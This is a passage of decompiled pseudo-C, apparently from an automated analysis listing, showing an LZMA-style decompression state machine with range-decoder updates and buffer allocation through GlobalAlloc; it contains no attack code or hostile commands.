						if( *(__ebp - 0x64) == 0) {
							 *(__ebp - 0x88) = 0x1b;
							L170:
							_t568 = 0x22;
							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
							_t536 = 0;
							goto L172;
						}
						__eax =  *(__ebp - 0x14);
						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
						if(__eax >=  *(__ebp - 0x74)) {
							__eax = __eax +  *(__ebp - 0x74);
						}
						__edx =  *(__ebp - 8);
						__cl =  *(__eax + __edx);
						__eax =  *(__ebp - 0x14);
						 *(__ebp - 0x5c) = __cl;
						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004074FE))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
